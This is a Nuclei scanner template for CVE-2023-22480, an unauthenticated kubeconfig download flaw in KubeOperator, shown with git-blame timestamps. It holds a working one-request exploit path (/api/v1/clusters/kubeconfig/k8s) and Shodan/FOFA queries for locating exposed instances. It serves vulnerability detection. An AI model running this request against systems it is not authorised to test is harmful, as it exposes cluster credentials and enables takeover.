nuclei-templates/http/cves/2023/CVE-2023-22480.yaml

63 lines
2.5 KiB
YAML
Raw Normal View History

2023-08-05 08:46:12 +00:00
id: CVE-2023-22480
info:
2023-08-07 17:23:08 +00:00
name: KubeOperator Foreground `kubeconfig` - File Download
2023-08-05 08:46:12 +00:00
author: DhiyaneshDk
severity: critical
description: |
KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can download sensitive files from the KubeOperator Foreground kubeconfig file, potentially leading to unauthorized access or exposure of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-08-05 08:46:12 +00:00
reference:
- https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1
2023-08-07 17:23:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-22480
2023-08-31 11:46:18 +00:00
- https://github.com/KubeOperator/KubeOperator/commit/7ef42bf1c16900d13e6376f8be5ecdbfdfb44aaf
- https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4
2023-08-05 08:46:12 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-08-31 11:46:18 +00:00
cve-id: CVE-2023-22480
cwe-id: CWE-863,CWE-285
2024-05-31 19:23:20 +00:00
epss-score: 0.03554
epss-percentile: 0.91598
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:*
2023-08-05 08:46:12 +00:00
metadata:
2023-08-07 17:23:08 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: fit2cloud
product: kubeoperator
shodan-query:
- html:"KubeOperator"
- http.html:"kubeoperator"
fofa-query:
- app="KubeOperator"
- body="kubeoperator"
- app="kubeoperator"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud
2023-08-05 08:46:12 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "apiVersion:"
- "clusters:"
condition: and
- type: word
part: header
words:
- "application/download"
- type: status
status:
- 200
# digest: 4b0a00483046022100f523e1f7b686395863572e0b76d481b4d2183ad5758e83adb8e721ce0214aa3702210086811079cc91bc1fda244f017f919e17786b27c27a78da59c9757fadb6024e13:922c64590222798bb761d5b6d8e72950